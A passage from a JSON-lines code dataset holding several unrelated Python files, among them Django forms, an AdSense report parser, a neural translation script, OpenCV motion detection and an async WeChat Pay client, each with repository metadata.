fa-rss'},\n ]\ncategories = [\n {'title':'技术','url':'_tech.md'},\n {'title':'生活','url':'life.md'},\n ]\ntags = ['Python','神经网络','tmux','爬虫']\n\nlinks = [\n {'title':'酷壳','url':'http://www.coolshell.cn'},\n {'title':'邓侃的博客','url':'http://blog.sina.com.cn/kdeng'},\n ]\n","sub_path":"tornado/setting-sample.py","file_name":"setting-sample.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"105018886","text":"import Command\n\n\nclass QUEUE(Command.Command):\n\n def __init__(self):\n self.__player_object = None\n\n def set_player_obj(self, obj):\n self.__player_object = obj\n\n def info(self):\n return \"player\"\n\n async def run(self, client, message):\n\n server = client.get_server_data(message)\n songs = self.__player_object.get_queue(server)\n\n inc = 0\n\n to_string = \"```Currently queued:\\n\\n\"\n\n for song in songs:\n if inc == 10:\n to_string += \"...\\n\"\n break\n to_string += song.get_name() + \"\\n\"\n inc += 1\n\n to_string += \"```\"\n\n return await client.send_message(message.channel, to_string)","sub_path":"ThreebotCommands/Player/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"639831142","text":"from django import forms\n\nfrom .fields import GroupedModelChoiceField\nfrom .models import Agentname, Lga, Party, PollingUnit, States\n\n\nclass GetPollingUnitDataForm(forms.Form):\n available_lgas = Lga.objects.filter(state_id=\"25\").values_list(\"lga_id\", flat=True)\n\n polling_unit = GroupedModelChoiceField(\n label=\"Polling Unit Number\",\n help_text=\"Choose a polling unit based on the polling unit number.\",\n queryset=PollingUnit.objects.filter(lga_id__in=available_lgas),\n choices_groupby=lambda obj: Lga.objects.get(lga_id=obj.lga_id).lga_name,\n )\n\n\nclass GetSummedPollingUnitsResultsinLgaForm(forms.Form):\n lga = GroupedModelChoiceField(\n label=\"Local Government Area\",\n queryset=Lga.objects.all(),\n choices_groupby=lambda obj: States.objects.get(state_id=obj.state_id).state_name,\n help_text=\"Select a local government area.\",\n )\n\n\nclass StoreNewPollingUnitResultForm(forms.Form):\n available_lgas = Lga.objects.filter(state_id=\"25\").values_list(\"lga_id\", flat=True)\n\n party = forms.ModelChoiceField(label=\"Party\", queryset=Party.objects.all())\n party_score = forms.IntegerField(label=\"Party Score\")\n polling_unit = GroupedModelChoiceField(\n label=\"Polling Unit\",\n help_text=\"Choose a polling unit based on the polling unit number.\",\n queryset=PollingUnit.objects.filter(lga_id__in=available_lgas),\n choices_groupby=lambda obj: Lga.objects.get(lga_id=obj.lga_id).lga_name,\n )\n entered_by_user = forms.ModelChoiceField(\n label=\"Agent\",\n queryset=Agentname.objects.all(),\n help_text=\"The name of the agent uploading the data.\",\n )\n","sub_path":"core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"29945294","text":"from django.views import generic\nfrom books.models import Book\nfrom django.http import Http404\nimport datetime\n\n\nclass BookListView(generic.ListView):\n model = Book\n context_object_name = 'books'\n\n def get_context_data(self, **kwargs):\n date = self.kwargs.get('pub_date')\n if date:\n try:\n formatted_date = datetime.datetime.strptime(date, '%Y-%m-%d')\n book = Book.objects.get(pub_date=formatted_date)\n prev_book = Book.objects.filter(pub_date__lt=formatted_date).order_by('pub_date').last()\n next_book = Book.objects.filter(pub_date__gt=formatted_date).order_by('pub_date').first()\n\n return {\n 'books': [book],\n 'prev_book': prev_book,\n 'next_book': next_book\n }\n except:\n raise Http404\n\n\n return super().get_context_data(**kwargs)\n\n","sub_path":"databases/models_list_displaying/books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"87397285","text":"\"\"\"\r\nReport.py\r\nCopyright (C) otacon 2010 \r\n\r\nAdSense-Monitor is free software: you can redistribute it and/or modify it\r\nunder the terms of the GNU General Public License as published by the\r\nFree Software Foundation, either version 3 of the License, or\r\n(at your option) any later version.\r\n\r\nAdSense-Monitor is distributed in the hope that it will be useful, but\r\nWITHOUT ANY WARRANTY; without even the implied warranty of\r\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\r\nSee the GNU General Public License for more details.\r\n \r\nYou should have received a copy of the GNU General Public License along\r\nwith this program. If not, see .\r\n\"\"\"\r\nfrom datetime import date\r\nimport re\r\n\r\nclass Report:\r\n\r\n\r\n def __init__(self,start_time = None,end_time = None):\r\n if not start_time:\r\n self.start_time = date.today()\r\n else:\r\n self.start_time = start_time\r\n\r\n if not end_time:\r\n self.end_time = date.today()\r\n else:\r\n self.end_time = end_time\r\n\r\n self.report_rows = []\r\n\r\n\r\n def add_row(self, report_row):\r\n if not isinstance(report_row,ReportRow):\r\n raise ValueError(\"report_row parameter must be ReportRow\")\r\n for row in self.report_rows:\r\n if row.get_day() == report_row.get_day():\r\n return False\r\n self.report_rows.append(report_row)\r\n\r\n\r\n def remove_row(self, report_row):\r\n if not isinstance(reportrow,ReportRow):\r\n raise ValueError(\"report_row parameter must be ReportRow\")\r\n\r\n for row in self.report_rows:\r\n if row.get_day() == report_row.get_day():\r\n self.report_rows.remove(row)\r\n return True\r\n return False\r\n\r\n\r\n def get_row(self, year, month, day):\r\n report_time = date(year,month,day)\r\n for row in self.report_rows:\r\n if row.get_day() == report_time:\r\n return row\r\n return None\r\n\r\n def get_latest(self):\r\n if self.report_rows:\r\n return self.report_rows[0]\r\n else:\r\n return None\r\n\r\n\r\nclass ReportRow:\r\n\r\n\r\n def __init__(self):\r\n self.report_dict = {}\r\n self.report_dict['Earnings'] = 0\r\n self.report_dict['eCPM'] = 0\r\n self.report_dict['Impressions'] = 0\r\n self.report_dict['Clicks'] = 0\r\n self.report_dict['CTR'] = 0\r\n self.report_dict['Report Time'] = None\r\n \r\n\r\n def set_earnings(self,earnings):\r\n if not isinstance(earnings, (int, float)):\r\n raise ValueError(\"ecpm parameter must be int or float\")\r\n self.report_dict['Earnings'] = earnings\r\n\r\n def get_earnings(self):\r\n return self.report_dict['Earnings']\r\n\r\n\r\n def set_ecpm(self,ecpm):\r\n if not isinstance(ecpm, (int, float)):\r\n raise ValueError(\"ecpm parameter must be int or float\")\r\n self.report_dict['eCPM'] = ecpm\r\n\r\n def get_ecpm(self):\r\n return self.report_dict['eCPM']\r\n\r\n\r\n def set_impressions(self,impressions):\r\n if not isinstance(impressions, (int)):\r\n raise ValueError(\"impressions parameter must be int\")\r\n self.report_dict['Impressions'] = impressions\r\n\r\n def get_impressions(self):\r\n return self.report_dict['Impressions']\r\n\r\n\r\n def set_clicks(self,clicks):\r\n if not isinstance(clicks, (int, float)):\r\n raise ValueError(\"clicks parameter must be int or float\")\r\n self.report_dict['Clicks'] = clicks\r\n\r\n def get_clicks(self):\r\n return self.report_dict['Clicks']\r\n\r\n\r\n def set_ctr(self,ctr):\r\n if not isinstance(ctr, (int, float)):\r\n raise ValueError(\"ctr parameter must be int or float\")\r\n self.report_dict['CTR'] = ctr\r\n\r\n def get_ctr(self):\r\n return self.report_dict['CTR']\r\n\r\n\r\n def set_day(self,year,month,day):\r\n report_time = date(year,month,day)\r\n self.report_dict['Report Time'] = report_time\r\n\r\n def get_day(self):\r\n return self.report_dict['Report Time']\r\n\r\n def get_differences(self,report_row):\r\n differences = []\r\n if report_row:\r\n if self.get_earnings() != report_row.get_earnings():\r\n differences.append('Earnings')\r\n if self.get_ecpm() != report_row.get_ecpm():\r\n differences.append('eCPM')\r\n if self.get_clicks() != report_row.get_clicks():\r\n differences.append('Clicks')\r\n if self.get_impressions() != report_row.get_impressions():\r\n differences.append('Impressions')\r\n if self.get_ctr() != report_row.get_ctr():\r\n differences.append('CTR')\r\n if self.get_day() != report_row.get_day():\r\n differences.append('Report Time')\r\n return differences\r\n \r\ndef parse_from_csv(csv_string):\r\n\r\n lines = csv_string.split('\\n')\r\n del lines[0]\r\n del lines[-1]\r\n del lines[-1]\r\n del lines[-1] \r\n report = Report()\r\n reg = re.compile('(....)-(..)-(..)\\t(.*?)\\t(.*?)\\t\"(.*?)%\"\\t\"(.*?)\"\\t\"(.*?)\"')\r\n for line in lines:\r\n value = reg.findall( line )\r\n year = int(value[0][0])\r\n month = int(value[0][1])\r\n day = int(value[0][2])\r\n impressions = int(value[0][3])\r\n clicks = int(value[0][4])\r\n ctr = float(value[0][5].replace(',','.'))\r\n ecpm = float(value[0][6].replace(',','.'))\r\n earnings = float(value[0][7].replace(',','.'))\r\n\r\n report_row = ReportRow() \r\n report_row.set_day(year,month,day)\r\n report_row.set_impressions(impressions)\r\n report_row.set_clicks(clicks)\r\n report_row.set_ctr(ctr)\r\n report_row.set_ecpm(ecpm)\r\n report_row.set_earnings(earnings)\r\n report.add_row(report_row)\r\n\r\n return report\r\n","sub_path":"core/Report.py","file_name":"Report.py","file_ext":"py","file_size_in_byte":5868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"615677606","text":"from semantic.tools.context import Context\nfrom semantic.tools.error import SemanticError, SemanticException\nfrom nodes.ast_nodes import ProgramNode, ClassNode\nfrom semantic.visitor import visitor\n\nclass TypeCollector(object):\n def __init__(self, errors=[]):\n self.context = None\n self.errors = errors\n\n @visitor.on('node')\n def visit(self, node):\n pass\n\n @visitor.when(ProgramNode)\n def visit(self, node):\n self.context = Context()\n self.context.create_builtin_types()\n for dec in node.classes:\n if dec.name in ['Object', 'Int', 'String', 'Bool', 'IO']:\n error = SemanticError(\"Is an error redefine a builint type\", dec.row, dec.col)\n self.errors.append(error)\n else:\n self.visit(dec)\n\n @visitor.when(ClassNode)\n def visit(self, node):\n try:\n self.context.create_type(node)\n except SemanticException as e:\n error = SemanticError(e.text, node.row, node.col)\n self.errors.append(error)\n","sub_path":"src/semantic/visitor/type_collector.py","file_name":"type_collector.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"272478063","text":"import argparse\nimport time\nimport torch\nfrom Models import get_model\nfrom Process import *\nimport torch.nn.functional as F\nfrom Optim import CosineWithRestarts\nfrom Batch import create_masks\nimport pdb\nimport dill as pickle\nimport argparse\nfrom Models import get_model\nfrom Beam import beam_search\nfrom nltk.corpus import wordnet\nfrom torch.autograd import Variable\nimport re\nimport random\nimport nltk.translate.bleu_score as bleu\n\ndef get_synonym(word, SRC):\n try:\n syns = wordnet.synsets(word)\n for s in syns:\n for l in s.lemmas():\n if SRC.vocab.stoi[l.name()] != 0:\n return SRC.vocab.stoi[l.name()]\n except:\n print('Resource wordnet not found.') \n return 0\n\ndef multiple_replace(dict, text):\n # Create a regular expression from the dictionary keys\n regex = re.compile(\"(%s)\" % \"|\".join(map(re.escape, dict.keys())))\n\n # For each match, look-up corresponding value in dictionary\n return regex.sub(lambda mo: dict[mo.string[mo.start():mo.end()]], text) \n\ndef postProcessing(src_sentence, translate_sentence):\n postProcessedSentence = translate_sentence\n if translate_sentence.strip().__contains__('....'):\n postProcessedSentence = translate_sentence.replace('....', '')\n if translate_sentence.strip().__contains__('..'):\n postProcessedSentence = translate_sentence.replace('..', '')\n # # Eg: \"Buổi sáng, tôi đang đi học\" -> \"bơgê, inh kung atung hok\"\n if len(src_sentence) > 0 and len(translate_sentence) > 0 and src_sentence[0].isupper() and not translate_sentence[0].isupper():\n postProcessedSentence = postProcessedSentence[0].upper() + postProcessedSentence[1:]\n if len(src_sentence) > 0 and len(translate_sentence) > 0 and src_sentence[0].isupper() and translate_sentence.startswith('\\'') and not translate_sentence[1].isupper():\n postProcessedSentence = '\\'' + postProcessedSentence[1].upper() + postProcessedSentence[2:]\n\n print('postProcessing', src_sentence, translate_sentence)\n # Eg: \"chắn\" -> \"Chơhning\"\n if len(src_sentence) > 0 and len(translate_sentence) > 0 and not src_sentence[0].isupper() and translate_sentence[0].isupper():\n postProcessedSentence = postProcessedSentence[0].lower() + postProcessedSentence[1:]\n if len(src_sentence) > 0 and len(translate_sentence) > 0 and not src_sentence[0].isupper() and translate_sentence.startswith('\\'') and translate_sentence[1].isupper():\n postProcessedSentence = '\\'' + postProcessedSentence[1].lower() + postProcessedSentence[2:]\n if not src_sentence.endswith('.') and translate_sentence.endswith('.'):\n lt = len(translate_sentence)\n postProcessedSentence = postProcessedSentence[:lt-1]\n elif src_sentence.endswith('.') and not translate_sentence.endswith('.'):\n postProcessedSentence += '.'\n return postProcessedSentence\n\ndef translate_sentence(sentence, model, opt, SRC, TRG):\n \n model.eval()\n indexed = []\n sentence = SRC.preprocess(sentence)\n for tok in sentence:\n if SRC.vocab.stoi[tok] != 0 or opt.floyd == True:\n indexed.append(SRC.vocab.stoi[tok])\n else:\n indexed.append(get_synonym(tok, SRC))\n sentence = Variable(torch.LongTensor([indexed]))\n if opt.device == 0:\n sentence = sentence.cuda()\n \n sentence = beam_search(sentence, model, SRC, TRG, opt)\n\n return multiple_replace({' ?' : '?',' !':'!',' .':'.','\\' ':'\\'',' ,':','}, sentence)\n\ndef translate(opt, model, SRC, TRG):\n sentences = opt.text.split('.')\n translated = []\n\n for sentence in sentences:\n res = translate_sentence(sentence + '.', model, opt, SRC, TRG).capitalize()\n res = postProcessing(src_sentence=sentence, translate_sentence=res)\n translated.append(res)\n\n return (' '.join(translated))\n\n\ndef randomizeTranslate(opt, model, SRC, TRG):\n txtVi = \"vi_0904_full_shuffle_test.txt\"\n txtBana = \"bana_0904_full_shuffle_test.txt\"\n txtViFile = open('data' + '/' + txtVi, encoding='utf-8', errors='ignore').read()\n txtBanaFile = open('data' + '/' + txtBana, encoding='utf-8', errors='ignore').read()\n splitsVi = txtViFile.split('\\n')\n splitsBana = txtBanaFile.split('\\n')\n txtViNew = ''\n txtBanaTranslated = ''\n txtBanaNew = ''\n num_rows = len(splitsVi)\n for i in range(200):\n try:\n randNum = random.randint(0, num_rows - 1)\n print('[VI] ' + splitsVi[randNum] + '\\n')\n opt.text = splitsVi[randNum]\n phrase = translate(opt, model, SRC, TRG)\n txtBanaTranslated += phrase + '\\n'\n txtViNew += splitsVi[randNum] + '\\n'\n txtBanaNew += splitsBana[randNum] + '\\n'\n print('[BANA] ' + phrase + '\\n')\n print('-----------------------------------------')\n except:\n print('An exception occured')\n \n with open('test_result' + '/test-sentences-vi.txt', 'w', encoding='utf-8') as f:\n f.write(txtViNew)\n with open('test_result' + '/test-sentences-bana.txt', 'w', encoding='utf-8') as f:\n f.write(txtBanaTranslated)\n with open('test_result' + '/truth-sentences-bana.txt', 'w', encoding='utf-8') as f:\n f.write(txtBanaNew)\n\n\ndef main():\n \n parser = argparse.ArgumentParser()\n parser.add_argument('-load_weights', required=True)\n parser.add_argument('-k', type=int, default=3)\n parser.add_argument('-max_len', type=int, default=80)\n parser.add_argument('-d_model', type=int, default=512)\n parser.add_argument('-n_layers', type=int, default=6)\n parser.add_argument('-src_lang', required=True)\n parser.add_argument('-trg_lang', required=True)\n parser.add_argument('-heads', type=int, default=8)\n parser.add_argument('-dropout', type=int, default=0.1)\n parser.add_argument('-no_cuda', action='store_true')\n parser.add_argument('-floyd', action='store_true')\n \n opt = parser.parse_args()\n\n opt.device = 0 if opt.no_cuda is False else -1\n \n assert opt.k > 0\n assert opt.max_len > 10\n\n SRC, TRG = create_fields(opt)\n model = get_model(opt, len(SRC.vocab), len(TRG.vocab))\n # randomizeTranslate(opt, model, SRC, TRG)\n \n while True:\n opt.text =input(\"Enter a sentence to translate (type 'f' to load from file, or 'q' to quit):\\n\")\n if opt.text==\"q\":\n break\n if opt.text=='f':\n fpath =input(\"Enter a sentence to translate (type 'f' to load from file, or 'q' to quit):\\n\")\n try:\n opt.text = ' '.join(open(opt.text, encoding='utf-8').read().split('\\n'))\n except:\n print(\"error opening or reading text file\")\n continue\n phrase = translate(opt, model, SRC, TRG)\n print('> '+ phrase + '\\n')\n\nif __name__ == '__main__':\n main()\n","sub_path":"translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":6812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"299088417","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\nimport imutils\nimport time\nimport cv2\n\nfrom settings import get_setting\nimport log\nfrom notification import add_notification\nfrom filemanagement import rename_file_with_motion\n\nvideo_frame_width = 500\n\ndef calculate_min_area(width, height):\n pixel_count = video_frame_width/width * height * video_frame_width\n per = get_setting(\"percentage_of_frame\") / 100\n \n return per * pixel_count\n\n#ugly solution to fix first notification problem\nprevious_notification_time = time.time() - 600\n\ndef detect_motion(file, ip_camera):\n #calculate min_area\n min_area = calculate_min_area(ip_camera.width, ip_camera.height) \n camera = cv2.VideoCapture(file.filename)\n firstFrame = None\n motion_detected = False\n global previous_notification_time\n \n log.log(0, \"Motion detection started on file: \" + file.filename)\n \n while(1):\n #grab the current frame and initialize the occupied/unoccupied\n (grabbed, frame) = camera.read()\n \n #if the frame could not be grabbed, then we have reached the end of the video\n if not grabbed:\n log.log(0, \"Motion detection ended on file: \" + file.filename)\n break\n\n if time.time() > previous_notification_time + get_setting(\"min_time_between_notifications\"):\n #resize the frame, convert it to grayscale, and blur it\n frame = imutils.resize(frame, width= video_frame_width)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\n \n #if the first frame is None, initialize it\n if firstFrame is None:\n firstFrame = gray\n continue\n \n #compute the absolute difference between the current frame and first frame\n frameDelta = cv2.absdiff(firstFrame, gray)\n thresh = cv2.threshold(frameDelta, 25, 255, cv2.THRESH_BINARY)[1]\n \n #dilate the thresholded image to fill in holes, then find contours on thresholded image\n thresh = cv2.dilate(thresh, None, iterations=2)\n (cnts, _) = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n #loop over the contours\n for c in cnts:\n #if the contour is too small, ignore it\n if cv2.contourArea(c) < min_area:\n continue\n #preventing too many notifications\n if time.time() > previous_notification_time + get_setting(\"min_time_between_notifications\"):\n log.log(1, \"Motion detected on \" + ip_camera.name)\n add_notification(\"Motion detected on \" + ip_camera.name)\n if not motion_detected:\n rename_file_with_motion(file)\n previous_notification_time = time.time()\n motion_detected = True\n file.motion = True\n continue\n\n #clean up the camera \n camera.release()\n","sub_path":"motiondetection.py","file_name":"motiondetection.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"272087958","text":"import json\nimport urllib\nfrom string import Template\nfrom datetime import date\n\n\ndef getPicAddress(ASIN):\n str1=\"http://112.124.1.3:8004/api/commodity/\"\n str2=\"?field=['productInfo']\"\n data=json.loads(urllib.urlopen(str1+ASIN+str2).read())\n return data['productInfo'][0]['img']\n\n\ndef getProductName(ASIN):\n str1=\"http://112.124.1.3:8004/api/commodity/\"\n str2=\"?field=['productInfo']\"\n data=json.loads(urllib.urlopen(str1+ASIN+str2).read())\n return data['productInfo'][0]['name'].replace('\"','"').replace(\",\",''')\n \n\ndef getAllProductsInCategory(categoryName):\n categoryName=categoryName.replace('&','$')\n count=getProductCount(categoryName)\n if count%20==0:\n pageNum=count/20\n else:\n pageNum=count/20+1\n ret=[]\n for i in range(1,pageNum+1):\n str1='http://112.124.1.3:8004/api/commodity?category_name=${name}'\n str2=\"page=${num}&field=['ASIN']\"\n data=json.loads(urllib.urlopen('&'.join([Template(str1).safe_substitute(name=categoryName),Template(str2).safe_substitute(num=str(i))])).read())\n for item in data:\n ret.append(item)\n return ret\n\n\ndef getProductCount(categoryName):\n categoryName=categoryName.replace('&','$')\n data=json.loads(urllib.urlopen('http://112.124.1.3:8004/api/commodity/count/?category_name='+categoryName).read())\n return data['count']\n\n\ndef getSaleTime(ASIN):\n str1=Template('http://112.124.1.3:8004/api/commodity/${product}').safe_substitute(product=ASIN)\n str2=\"field=['review']\"\n data=json.loads(urllib.urlopen('?'.join([str1,str2])).read())\n ret=[]\n for item in data['review']:\n datestr=item['publishTime'].split(None,1)[0]\n datearr=datestr.split('-')\n dateobj=date(int(datearr[0]),int(datearr[1]),int(datearr[2]))\n ret.append(dateobj)\n list.sort(ret)\n return ret\n\n\n#Only the lowest price of the same time is obtained...\ndef getOfferList(ASIN):\n str1=Template('http://112.124.1.3:8004/api/commodity/${product}').safe_substitute(product=ASIN)\n str2=\"field=['offer']\"\n data=json.loads(urllib.urlopen('?'.join([str1,str2])).read())\n ret=dict()\n for item in data['offer']:\n for smallerItem in item['info']:\n datestr=smallerItem['timestamp'].split(None,1)[0]\n datearr=datestr.split('-')\n key=date(int(datearr[0]),int(datearr[1]),int(datearr[2]))\n if ret.has_key(key):\n if smallerItem['price']{1}\".format(k, v, k)\n return \"{0}\".format(s)\n\n def to_dict(self, content):\n raw = {}\n root = etree.fromstring(content)\n for child in root:\n raw[child.tag] = child.text\n return raw\n\n async def fetch(self, url, data, setdefault=True, loop=None):\n if setdefault:\n data.setdefault(\"appid\", self.app_id)\n data.setdefault(\"mch_id\", self.mch_id)\n data.setdefault(\"nonce_str\", self.nonce_str)\n data.setdefault(\"sign\", self.sign(data))\n\n if loop is None:\n loop = asyncio.get_event_loop()\n\n connector = aiohttp.TCPConnector(ssl_context=self.ssl_context)\n async with aiohttp.ClientSession(connector=connector, loop=loop) as session:\n async with session.post(url, data=self.to_xml(data).encode(\"utf-8\")) as resp:\n content = await resp.text(encoding='utf-8')\n\n if \"return_code\" in content:\n data = Map(self.to_dict(content))\n if data.return_code == FAIL:\n raise WeixinPayError(data.return_msg)\n if \"result_code\" in content and data.result_code == FAIL:\n raise WeixinPayError(data.err_code_des)\n return data\n return content\n\n def reply(self, msg, ok=True):\n code = SUCCESS if ok else FAIL\n return self.to_xml(dict(return_code=code, return_msg=msg))\n\n async def unified_order(self, loop=None, **data):\n \"\"\"\n 统一下单\n out_trade_no、body、total_fee、spbill_create_ip、trade_type必填\n app_id, mchid, nonce_str自动填写\n \"\"\"\n url = \"https://api.mch.weixin.qq.com/pay/unifiedorder\"\n\n # 必填参数\n if \"out_trade_no\" not in data:\n raise WeixinPayError(\"缺少统一支付接口必填参数out_trade_no\")\n if \"body\" not in data:\n raise WeixinPayError(\"缺少统一支付接口必填参数body\")\n if \"total_fee\" not in data:\n raise WeixinPayError(\"缺少统一支付接口必填参数total_fee\")\n if \"trade_type\" not in data:\n raise WeixinPayError(\"缺少统一支付接口必填参数trade_type\")\n if \"notify_url\" not in data:\n raise WeixinPayError(\"缺少统一支付接口必填参数notify_url\")\n\n # 关联参数\n if data[\"trade_type\"] == \"JSAPI\" and \"openid\" not in data:\n raise WeixinPayError(\"trade_type为JSAPI时,openid为必填参数\")\n if data[\"trade_type\"] == \"NATIVE\" and \"product_id\" not in data:\n raise WeixinPayError(\"trade_type为NATIVE时,product_id为必填参数\")\n\n raw = await self.fetch(url, data, loop=loop)\n return raw\n\n async def jsapi(self, loop=None, **kwargs):\n \"\"\"\n 生成给JavaScript调用的数据\n 详细规则参考 https://pay.weixin.qq.com/wiki/doc/api/jsapi.php?chapter=7_7&index=6\n \"\"\"\n kwargs.setdefault(\"trade_type\", \"JSAPI\")\n raw = await self.unified_order(loop=loop, **kwargs)\n package = \"prepay_id={0}\".format(raw[\"prepay_id\"])\n timestamp = str(int(time.time()))\n nonce_str = self.nonce_str\n raw = dict(appId=self.app_id, timeStamp=timestamp,\n nonceStr=nonce_str, package=package, signType=\"MD5\")\n sign = self.sign(raw)\n return dict(package=package, appId=self.app_id, timeStamp=timestamp,\n nonceStr=nonce_str, signType=\"MD5\", paySign=sign)\n\n async def order_query(self, loop=None, **data):\n \"\"\"\n 订单查询\n out_trade_no, transaction_id至少填一个\n appid, mchid, nonce_str不需要填入\n \"\"\"\n url = \"https://api.mch.weixin.qq.com/pay/orderquery\"\n\n if \"out_trade_no\" not in data and \"transaction_id\" not in data:\n raise WeixinPayError(\"订单查询接口中,out_trade_no、transaction_id至少填一个\")\n\n return await self.fetch(url, data, loop=loop)\n\n async def close_order(self, out_trade_no, loop=None, **data):\n \"\"\"\n 关闭订单\n out_trade_no必填\n appid, mchid, nonce_str不需要填入\n \"\"\"\n url = \"https://api.mch.weixin.qq.com/pay/closeorder\"\n\n data.setdefault(\"out_trace_no\", out_trade_no)\n\n return await self.fetch(url, data, loop=loop)\n\n async def refund(self, loop=None, **data):\n \"\"\"\n 申请退款\n out_trade_no、transaction_id至少填一个且\n out_refund_no、total_fee、refund_fee、op_user_id为必填参数\n appid、mchid、nonce_str不需要填入\n \"\"\"\n if not self.ssl_context:\n raise WeixinError(\"退款申请接口需要双向证书\")\n url = \"https://api.mch.weixin.qq.com/secapi/pay/refund\"\n if \"out_trade_no\" not in data and \"transaction_id\" not in data:\n raise WeixinPayError(\"退款申请接口中,out_trade_no、transaction_id至少填一个\")\n if \"out_refund_no\" not in data:\n raise WeixinPayError(\"退款申请接口中,缺少必填参数out_refund_no\")\n if \"total_fee\" not in data:\n raise WeixinPayError(\"退款申请接口中,缺少必填参数total_fee\")\n if \"refund_fee\" not in data:\n raise WeixinPayError(\"退款申请接口中,缺少必填参数refund_fee\")\n if \"op_user_id\" not in data:\n raise WeixinPayError(\"退款申请接口中,缺少必填参数op_user_id\")\n\n return await self.fetch(url, data, loop=loop)\n\n async def refund_query(self, loop=None, **data):\n \"\"\"\n 查询退款\n 提交退款申请后,通过调用该接口查询退款状态。退款有一定延时,\n 用零钱支付的退款20分钟内到账,银行卡支付的退款3个工作日后重新查询退款状态。\n\n out_refund_no、out_trade_no、transaction_id、refund_id四个参数必填一个\n appid、mchid、nonce_str不需要填入\n \"\"\"\n url = \"https://api.mch.weixin.qq.com/pay/refundquery\"\n if \"out_refund_no\" not in data and \"out_trade_no\" not in data \\\n and \"transaction_id\" not in data and \"refund_id\" not in data:\n raise WeixinPayError(\"退款查询接口中,out_refund_no、out_trade_no、transaction_id、refund_id四个参数必填一个\")\n\n return await self.fetch(url, data, loop=loop)\n\n async def download_bill(self, bill_date, bill_type=\"ALL\", loop=None, **data):\n \"\"\"\n 下载对账单\n bill_date、bill_type为必填参数\n appid、mchid、nonce_str不需要填入\n \"\"\"\n url = \"https://api.mch.weixin.qq.com/pay/downloadbill\"\n data.setdefault(\"bill_date\", bill_date)\n data.setdefault(\"bill_type\", bill_type)\n\n if \"bill_date\" not in data:\n raise WeixinPayError(\"对账单接口中,缺少必填参数bill_date\")\n\n return await self.fetch(url, data, loop=loop)\n\n async def transfers(self, check_name=False, loop=None, **data):\n \"\"\"\n 企业付款\n 用于企业向微信用户个人付款\n 目前支持向指定微信用户的openid付款\n\n partner_trade_no、openid、amount、desc、spbill_create_ip必填\n 如果check_name为true,re_user_name必填\n appid、mchid、nonce_str不需要填入\n \"\"\"\n url = \"https://api.mch.weixin.qq.com/mmpaymkttransfers/promotion/transfers\"\n\n if \"partner_trade_no\" not in data:\n raise WeixinPayError(\"企业付款接口中,缺少必填参数partner_trade_no\")\n if \"openid\" not in data:\n raise WeixinPayError(\"企业付款接口中,缺少必填参数openid\")\n if \"amount\" not in data:\n raise WeixinPayError(\"企业付款接口中,缺少必填参数amount\")\n if \"desc\" not in data:\n raise WeixinPayError(\"企业付款接口中,缺少必填参数desc\")\n if \"spbill_create_ip\" not in data:\n raise WeixinPayError(\"企业付款接口中,缺少必填参数spbill_create_ip\")\n if check_name is True and \"re_user_name\" not in data:\n raise WeixinPayError(\"企业付款接口中,缺少必填参数re_user_name\")\n\n if check_name is True:\n data[\"check_name\"] = \"FORCE_CHECK\"\n else:\n data[\"check_name\"] = \"NO_CHECK\"\n\n # 微信你坑啊\n data[\"mch_appid\"] = self.app_id\n data[\"mchid\"] = self.mch_id\n data[\"nonce_str\"] = self.nonce_str\n data[\"sign\"] = self.sign(data)\n\n return await self.fetch(url, data, setdefault=False, loop=loop)\n\n async def get_transfer_info(self, partner_trade_no, loop=None):\n \"\"\"\n 查询企业付款\n 用于商户的企业付款操作进行结果查询,返回付款操作详细结果。\n 查询企业付款API只支持查询30天内的订单,30天之前的订单请登录商户平台查询。\n\n partner_trade_no必填\n \"\"\"\n if not self.ssl_context:\n raise WeixinError(\"查询企业付款接口需要双向证书\")\n url = \"https://api.mch.weixin.qq.com/mmpaymkttransfers/gettransferinfo\"\n\n data = dict(partner_trade_no=partner_trade_no)\n\n return await self.fetch(url, data, loop=loop)\n","sub_path":"wxpay.py","file_name":"wxpay.py","file_ext":"py","file_size_in_byte":12254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"28035713","text":"import json\nimport unittest\nfrom contrib import db, jwt_encode\nfrom delete import handler\n\n\nclass DeleteSuite(unittest.TestCase):\n def setUp(self):\n db.table('work').truncate()\n db.table('workRole').truncate()\n\n def tearDown(self):\n db.table('work').truncate()\n db.table('workRole').truncate()\n\n def test_delete(self):\n user_id = 'user'\n work_id = 'work'\n\n db.table('work').insert({'id': work_id})\n db.table('workRole').insert({\n 'userId': user_id,\n 'workId': work_id,\n 'type': 'author',\n })\n\n work = db.table('work').where('id', work_id).first()\n\n self.assertIsNone(work.get('deletedAt'))\n\n handler({\n 'headers': {\n 'Authorization': jwt_encode(user_id),\n },\n 'pathParameters': {\n 'id': work_id,\n },\n }, None)\n\n work = db.table('work').where('id', work_id).first()\n\n self.assertIsNotNone(work.get('deletedAt'))\n\n def test_delete_by_not_authorized(self):\n user_id = 'user'\n work_id = 'work'\n\n db.table('work').insert({'id': work_id})\n db.table('workRole').insert({\n 'userId': user_id,\n 'workId': work_id,\n 'type': 